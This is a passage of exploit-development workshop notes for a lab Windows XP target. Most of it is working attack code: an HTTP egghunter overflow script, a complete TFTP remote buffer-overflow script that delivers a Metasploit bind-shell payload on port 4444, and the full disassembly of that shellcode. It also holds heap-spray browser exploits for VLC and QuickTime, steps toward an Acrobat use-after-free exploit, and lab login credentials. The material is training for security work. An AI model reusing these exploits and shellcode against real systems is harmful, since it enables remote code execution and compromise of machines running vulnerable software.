  1849. - it will pop up a menu
  1850. - select "start"
  1851. - dialog box shows starting params - port 82
  1852.  
  1853. WinDBG
  1854. - attach to "server.exe"
  1855.  
  1856.  
  1857. python sws1.py | nc XPSP3-ED-Target-IP 82
  1858.  
  1859.  
  1860.  
  1861. python sws2.py | nc XPSP3-ED-Target-IP 82
  1862.  
  1863.  
  1864. SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
  1865. cd /home/strategicsec/toolz/metasploit/tools
  1866. ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
  1867. ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
  1868.  
  1869.  
  1870.  
  1871.  
  1872.  
  1873.  
  1874.  
  1875.  
  1876. EGGHUNTER:
  1877. ----------
  1878.  
  1879. "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  1880. "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  1881. ^^^^^^^^^^^^^^^^
  1882. ABBA
  1883. JMP ESP
  1884. /
  1885. /
  1886. GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
  1887. User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
  1888.  
  1889.  
  1890.  
  1891.  
  1892. -----sws3.py-----
  1893. #!/usr/bin/python2
  1894.  
  1895. import os # for output setting
  1896. import sys
  1897. import struct # for pack function
  1898.  
  1899. # turn off output buffer and set binary mode
  1900. sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
  1901.  
  1902.  
  1903. pad = "A" * 225 # distance to EIP
  1904. eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
  1905.  
  1906. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  1907. egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  1908.  
  1909. shellcode = "\xCC" * 700
  1910.  
  1911. buf = "GET /"
  1912. buf += pad + struct.pack('<I', eip) + egghunter
  1913. buf += " HTTP/1.0\r\n"
  1914. buf += "User-Agent: ABBAABBA"
  1915. buf += shellcode
  1916. buf += " HTTP/1.0\r\n"
  1917.  
  1918. sys.stdout.write(buf)
  1919. -----
  1920.  
  1921. ############################################
  1922. # Lab 2b: Not Enough Space (Negative Jump) #
  1923. ############################################
  1924.  
  1925. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
  1926.  
  1927.  
  1928. [pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
  1929.  
  1930. ^
  1931. 1 ----------------------1 overflow the buffer---------------------------|
  1932.  
  1933. ^ ^
  1934. |
  1935. 2 ----jump over seh record---|
  1936.  
  1937. ^ ^
  1938. |
  1939. 3--POP 2 words off stack---|
  1940.  
  1941. ^
  1942. 4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|
  1943.  
  1944.  
  1945. #################################
  1946. # Not Enough Space (Trampoline) #
  1947. #################################
  1948.  
  1949. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
  1950. On the Strategicsec-XP-ED-Target-VM VM
  1951.  
  1952. - open a command prompt
  1953. - c:\software\tftpd32
  1954. - run tftpd32.exe
  1955. - UDP port 69
  1956. (socket code is already in the scripts)
  1957.  
  1958.  
  1959.  
  1960.  
  1961. On your attack host please install:
  1962.  
  1963.  
  1964. NASM - Netwide Assembler
  1965.  
  1966.  
  1967.  
  1968.  
  1969.  
  1970. -----------------------------------------------------------------------------------------------------------------
  1971.  
  1972.  
  1973. We want to generate the shellcode (BIND SHELL on Port 4444)
  1974. - No restricted characters
  1975. - Encoder: NONE
  1976.  
  1977. Create a Python file called dumpshellcode.py
  1978.  
  1979. ---
  1980. #!/usr/bin/python2
  1981.  
  1982. import os
  1983. import sys
  1984. import struct
  1985.  
  1986.  
  1987. # win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
  1988. shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  1989. shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  1990. shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  1991. shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  1992. shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  1993. shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  1994. shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  1995. shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  1996. shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  1997. shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  1998. shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  1999. shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  2000. shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  2001. shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  2002. shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  2003. shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  2004. shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  2005. shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  2006. shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  2007. shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  2008.  
  2009. sys.stdout.write(shellcode)
  2010. ---
  2011.  
  2012.  
  2013.  
  2014. python dumpshell.py > bindshell.bin
  2015.  
  2016. copy bindshellcode.bin into the "c:\Program Files\nasm" directory
  2017.  
  2018.  
  2019.  
  2020. Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
  2021. 317 bindshell.bin
  2022.  
  2023. C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
  2024. 00000000 FC cld
  2025. 00000001 6AEB push byte -0x15
  2026. 00000003 4D dec ebp
  2027. 00000004 E8F9FFFFFF call dword 0x2
  2028. 00000009 60 pushad
  2029. 0000000A 8B6C2424 mov ebp,[esp+0x24]
  2030. 0000000E 8B453C mov eax,[ebp+0x3c]
  2031. 00000011 8B7C0578 mov edi,[ebp+eax+0x78]
  2032. 00000015 01EF add edi,ebp
  2033. 00000017 8B4F18 mov ecx,[edi+0x18]
  2034. 0000001A 8B5F20 mov ebx,[edi+0x20]
  2035. 0000001D 01EB add ebx,ebp
  2036. 0000001F 49 dec ecx
  2037. 00000020 8B348B mov esi,[ebx+ecx*4]
  2038. 00000023 01EE add esi,ebp
  2039. 00000025 31C0 xor eax,eax
  2040. 00000027 99 cdq
  2041. 00000028 AC lodsb
  2042. 00000029 84C0 test al,al
  2043. 0000002B 7407 jz 0x34
  2044. 0000002D C1CA0D ror edx,0xd
  2045. 00000030 01C2 add edx,eax
  2046. 00000032 EBF4 jmp short 0x28
  2047. 00000034 3B542428 cmp edx,[esp+0x28]
  2048. 00000038 75E5 jnz 0x1f
  2049. 0000003A 8B5F24 mov ebx,[edi+0x24]
  2050. 0000003D 01EB add ebx,ebp
  2051. 0000003F 668B0C4B mov cx,[ebx+ecx*2]
  2052. 00000043 8B5F1C mov ebx,[edi+0x1c]
  2053. 00000046 01EB add ebx,ebp
  2054. 00000048 032C8B add ebp,[ebx+ecx*4]
  2055. 0000004B 896C241C mov [esp+0x1c],ebp
  2056. 0000004F 61 popad
  2057. 00000050 C3 ret
  2058. 00000051 31DB xor ebx,ebx
  2059. 00000053 648B4330 mov eax,[fs:ebx+0x30]
  2060. 00000057 8B400C mov eax,[eax+0xc]
  2061. 0000005A 8B701C mov esi,[eax+0x1c]
  2062. 0000005D AD lodsd
  2063. 0000005E 8B4008 mov eax,[eax+0x8]
  2064. 00000061 5E pop esi
  2065. 00000062 688E4E0EEC push dword 0xec0e4e8e
  2066. 00000067 50 push eax
  2067. 00000068 FFD6 call esi
  2068. 0000006A 6653 push bx
  2069. 0000006C 66683332 push word 0x3233
  2070. 00000070 687773325F push dword 0x5f327377
  2071. 00000075 54 push esp
  2072. 00000076 FFD0 call eax
  2073. 00000078 68CBEDFC3B push dword 0x3bfcedcb
  2074. 0000007D 50 push eax
  2075. 0000007E FFD6 call esi PART 1
  2076. 00000080 5F pop edi
  2077. 00000081 89E5 mov ebp,esp
  2078. 00000083 6681ED0802 sub bp,0x208
  2079. 00000088 55 push ebp
  2080. 00000089 6A02 push byte +0x2
  2081. 0000008B FFD0 call eax
  2082. 0000008D 68D909F5AD push dword 0xadf509d9
  2083. 00000092 57 push edi
  2084. 00000093 FFD6 call esi
  2085. 00000095 53 push ebx
  2086. 00000096 53 push ebx
  2087. --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
  2088. 00000097 53 push ebx
  2089. 00000098 53 push ebx
  2090. 00000099 53 push ebx
  2091. 0000009A 43 inc ebx
  2092. 0000009B 53 push ebx
  2093. 0000009C 43 inc ebx
  2094. 0000009D 53 push ebx PART 2
  2095. 0000009E FFD0 call eax
  2096. 000000A0 6668115C push word 0x5c11
  2097. 000000A4 6653 push bx
  2098. 000000A6 89E1 mov ecx,esp
  2099. 000000A8 95 xchg eax,ebp
  2100. 000000A9 68A41A70C7 push dword 0xc7701aa4
  2101. 000000AE 57 push edi
  2102. 000000AF FFD6 call esi
  2103. 000000B1 6A10 push byte +0x10
  2104. 000000B3 51 push ecx
  2105. 000000B4 55 push ebp
  2106. 000000B5 FFD0 call eax
  2107. 000000B7 68A4AD2EE9 push dword 0xe92eada4
  2108. 000000BC 57 push edi
  2109. 000000BD FFD6 call esi
  2110. 000000BF 53 push ebx
  2111. 000000C0 55 push ebp
  2112. 000000C1 FFD0 call eax
  2113. 000000C3 68E5498649 push dword 0x498649e5
  2114. 000000C8 57 push edi
  2115. 000000C9 FFD6 call esi
  2116. 000000CB 50 push eax
  2117. 000000CC 54 push esp
  2118. 000000CD 54 push esp
  2119. 000000CE 55 push ebp
  2120. 000000CF FFD0 call eax
  2121. 000000D1 93 xchg eax,ebx
  2122. 000000D2 68E779C679 push dword 0x79c679e7
  2123. 000000D7 57 push edi
  2124. 000000D8 FFD6 call esi
  2125. 000000DA 55 push ebp
  2126. 000000DB FFD0 call eax
  2127. 000000DD 666A64 push word 0x64
  2128. 000000E0 6668636D push word 0x6d63
  2129. 000000E4 89E5 mov ebp,esp
  2130. 000000E6 6A50 push byte +0x50
  2131. 000000E8 59 pop ecx
  2132. 000000E9 29CC sub esp,ecx
  2133. 000000EB 89E7 mov edi,esp
  2134. 000000ED 6A44 push byte +0x44
  2135. 000000EF 89E2 mov edx,esp
  2136. 000000F1 31C0 xor eax,eax
  2137. 000000F3 F3AA rep stosb
  2138. 000000F5 FE422D inc byte [edx+0x2d]
  2139. 000000F8 FE422C inc byte [edx+0x2c]
  2140. 000000FB 93 xchg eax,ebx
  2141. 000000FC 8D7A38 lea edi,[edx+0x38]
  2142. 000000FF AB stosd
  2143. 00000100 AB stosd
  2144. 00000101 AB stosd
  2145. 00000102 6872FEB316 push dword 0x16b3fe72
  2146. 00000107 FF7544 push dword [ebp+0x44]
  2147. 0000010A FFD6 call esi
  2148. 0000010C 5B pop ebx
  2149. 0000010D 57 push edi
  2150. 0000010E 52 push edx
  2151. 0000010F 51 push ecx
  2152. 00000110 51 push ecx
  2153. 00000111 51 push ecx
  2154. 00000112 6A01 push byte +0x1
  2155. 00000114 51 push ecx
  2156. 00000115 51 push ecx
  2157. 00000116 55 push ebp
  2158. 00000117 51 push ecx
  2159. 00000118 FFD0 call eax
  2160. 0000011A 68ADD905CE push dword 0xce05d9ad
  2161. 0000011F 53 push ebx
  2162. 00000120 FFD6 call esi
  2163. 00000122 6AFF push byte -0x1
  2164. 00000124 FF37 push dword [edi]
  2165. 00000126 FFD0 call eax
  2166. 00000128 8B57FC mov edx,[edi-0x4]
  2167. 0000012B 83C464 add esp,byte +0x64
  2168. 0000012E FFD6 call esi
  2169. 00000130 52 push edx
  2170. 00000131 FFD0 call eax
  2171. 00000133 68F08A045F push dword 0x5f048af0
  2172. 00000138 53 push ebx
  2173. 00000139 FFD6 call esi
  2174. 0000013B FFD0 call eax
  2175.  
  2176.  
  2177.  
  2178.  
  2179. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  2180. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  2181. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  2182. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  2183. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  2184. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  2185. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  2186. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  2187. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  2188. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  2189.  
  2190.  
  2191. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  2192. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  2193. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  2194. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  2195. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  2196. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  2197. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  2198. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  2199. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  2200. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  2201. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  2202.  
  2203.  
  2204. STACK SHIFTER:
  2205. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  2206. prepend += "\x44" # inc esp
  2207.  
  2208.  
  2209.  
  2210.  
  2211.  
  2212.  
  2213.  
  2214.  
  2215.  
  2216.  
  2217.  
  2218.  
  2219.  
  2220.  
  2221. ---- final script ----
  2222.  
  2223. #!/usr/bin/python2
  2224. #TFTP Server remote Buffer Overflow
  2225.  
  2226. import sys
  2227. import socket
  2228. import struct
  2229.  
  2230. if len(sys.argv) < 2:
  2231. sys.stderr.write("Usage: tftpd.py <host>\n")
  2232. sys.exit(1)
  2233.  
  2234. target = sys.argv[1]
  2235. port = 69
  2236.  
  2237. eip = 0x7e429353 # jmp esp in USER32.DLL
  2238.  
  2239. part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  2240. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  2241. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  2242. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  2243. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  2244. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  2245. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  2246. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  2247. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  2248. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  2249.  
  2250. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  2251. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  2252. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  2253. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  2254. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  2255. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  2256. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  2257. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  2258. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  2259. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  2260. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  2261.  
  2262. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  2263. prepend += "\x44" # inc esp
  2264.  
  2265. buf = "\x00\x01" # receive command
  2266.  
  2267. buf += "\x90" * (256 - len(part2)) # NOPs
  2268. buf += part2 # shellcode part 2
  2269. buf += struct.pack('<I', eip) # EIP (JMP ESP)
  2270. buf += prepend # stack shifter
  2271. buf += part1 # shellcode part 1
  2272. buf += "\xE9" + struct.pack('<i', -380) # JMP -380
  2273. buf += "\x00" # END
  2274.  
  2275. # print buf
  2276.  
  2277. # buf = "\x00\x01" # receive command
  2278.  
  2279. # buf += "A" * 300 + "\x00"
  2280.  
  2281. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  2282.  
  2283. try:
  2284. sock.connect((target, port))
  2285. sock.sendall(buf)
  2286. except Exception as e:
  2287. sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
  2288. finally:
  2289. sock.close()
  2290. sys.stderr.write("Sent.\n")
  2291.  
  2292.  
  2293.  
  2294. -----------------------------------------------------------------------------------------------------------------
  2295.  
  2296.  
  2297.  
  2298.  
  2299. How does all of this actually work
  2300.  
  2301.  
  2302.  
  2303.  
  2304. Total shellcode length: 315
  2305.  
  2306. Part1: 150
  2307. Part2: 165
  2308.  
  2309.  
  2310. NOPS * (256 - 165)
  2311.  
  2312. 91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
  2313. | | |
  2314. 256 260 150 (410) |
  2315. |<------------------------------------------------------------------------------------------------------------|
  2316. Jump to the
  2317. 30 byte mark
  2318.  
  2319.  
  2320.  
  2321. #####################
  2322. # Browsers Exploits #
  2323. #####################
  2324.  
  2325. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
  2326. Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
  2327. rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
  2328.  
  2329. <object id=quicktime clsid="999-999999-99-99999">
  2330. <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
  2331. </object>
  2332.  
  2333. var buf = "";
  2334. for(i = 0; i < 50000; i++)
  2335. buf += "A";
  2336. var myobject = document.getElementById("quicktime");
  2337. myobject.url = buf;
  2338.  
  2339. YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
  2340.  
  2341. - Browsers (Flash)
  2342. - PDF
  2343. - MS Office / OOo
  2344.  
  2345. VLC smb:// exploit
  2346. ------------------
  2347.  
  2348. EXPLOIT VECTOR
  2349.  
  2350. smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
  2351.  
  2352. Exploit Scripts
  2353. - ffvlc
  2354.  
  2355. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
  2356.  
  2357. perl daemon.pl vlc0.html
  2358.  
  2359. ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
  2360. Browse to http://your_host_ip_address:8080/
  2361.  
  2362. vlc0.html
  2363. ---------
  2364. <script>
  2365. var buf = "";
  2366. for(i = 0; i < 1250; i++)
  2367. buf += unescape("%41%41%41%41");
  2368. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  2369. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  2370. </script>
  2371.  
  2372. vlc1.html
  2373. ---------
  2374. <script>
  2375.  
  2376. // shellcode created in heap memory
  2377. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  2378.  
  2379. // 800K block of NOPS
  2380. var nop = unescape("%u9090%u09090"); // 4 NOPS
  2381. while(nop.length < 0xc0000) {
  2382. nop += nop;
  2383. }
  2384.  
  2385. // spray the heap with NOP+shellcode
  2386. var memory = new Array();
  2387. for(i = 0; i < 50; i++) {
  2388. memory[i] = nop + shellcode;
  2389. }
  2390.  
  2391. // build the exploit payload
  2392. var buf = "";
  2393. for(i = 0; i < 1250; i++)
  2394. buf += unescape("%41%41%41%41");
  2395. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  2396.  
  2397. // trigger the exploit
  2398. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  2399. </script>
  2400.  
  2401. perl daemon.pl vlc1.html
  2402.  
  2403. Search for where our NOPS+shellcode lies in the heap
  2404.  
  2405. s 0 l fffffff 90 90 90 90 cc cc cc cc
  2406.  
  2407. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
  2408. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2409. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2410. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2411. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2412. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2413. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2414. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2415. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2416. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2417. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2418. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2419. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2420. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2421. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2422. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2423. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2424.  
  2425. Edit vlc2.html
  2426. replace %41%41%41%41 with %07%07%07%07
  2427.  
  2428. (928.fd0): Break instruction exception - code 80000003 (first chance)
  2429. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
  2430. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
  2431. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  2432. 07100000 cc int 3
  2433. 0:019> u
  2434. 07100000 cc int 3
  2435. 07100001 cc int 3
  2436. 07100002 cc int 3
  2437. 07100003 cc int 3
  2438. 07100004 cc int 3
  2439. 07100005 cc int 3
  2440. 07100006 cc int 3
  2441. 07100007 cc int 3
  2442.  
  2443. Create vlc3.html (Copy vlc2.html to vlc3.html)
  2444. ----------------------------------------------
  2445. Win32 Reverse Shell
  2446. - no restricted characters
  2447. - Encoder NONE
  2448. - use the Javascript encoded payload generated by msfweb
  2449.  
  2450.  
  2451.  
  2452.  
  2453. ################
  2454. # PDF EXPLOITS #
  2455. ################
  2456.  
  2457.  
  2458.  
  2459. \Lab4\adobe_mnp_skeleton
  2460.  
  2461. Acrobat Media newPlayer exploit
  2462. -------------------------------
  2463.  
  2464. Use-after-free bug
  2465.  
  2466. Exploit scripts are online at 172.16.0.100
  2467. - adobe_mnp
  2468.  
  2469. Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.
  2470.  
  2471.  
  2472. mnp0.pdf
  2473.  
  2474. - Open up acrobat reader
  2475. - WinDBG
  2476. - F6 attach to AcroRd32.exe
  2477. - g to Go
  2478.  
  2479. EIP = 41414141
  2480.  
  2481. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
  2482.  
  2483. mnp1.pdf
  2484.  
  2485. All we are doing is changing EIP to 0c0c0c0c.
  2486. There is no heap spray in this one.
  2487.  
  2488. This exception may be expected and handled.
  2489. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
  2490. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
  2491. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  2492. 0c0c0c0c ?? ???
  2493.  
  2494. We know we get EIP control
  2495.  
  2496. mnp2.pdf
  2497.  
  2498. Put in the heap spray.
  2499.  
  2500. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  2501.  
  2502. var nops = unescape("%u9090%u9090");
  2503.  
  2504. while(nops.length <= 32768)
  2505. nops += nops;
  2506. nops = nops.substring(0,32768 - shellcode.length);
  2507.  
  2508. memory = new Array();
  2509.  
  2510. for(i = 0; i < 1500; i++) {
  2511. memory[i] = nops + shellcode;
  2512. }
  2513.  
  2514. 1500 NOP+shellcode blocks of 32K NOPs each
  2515.  
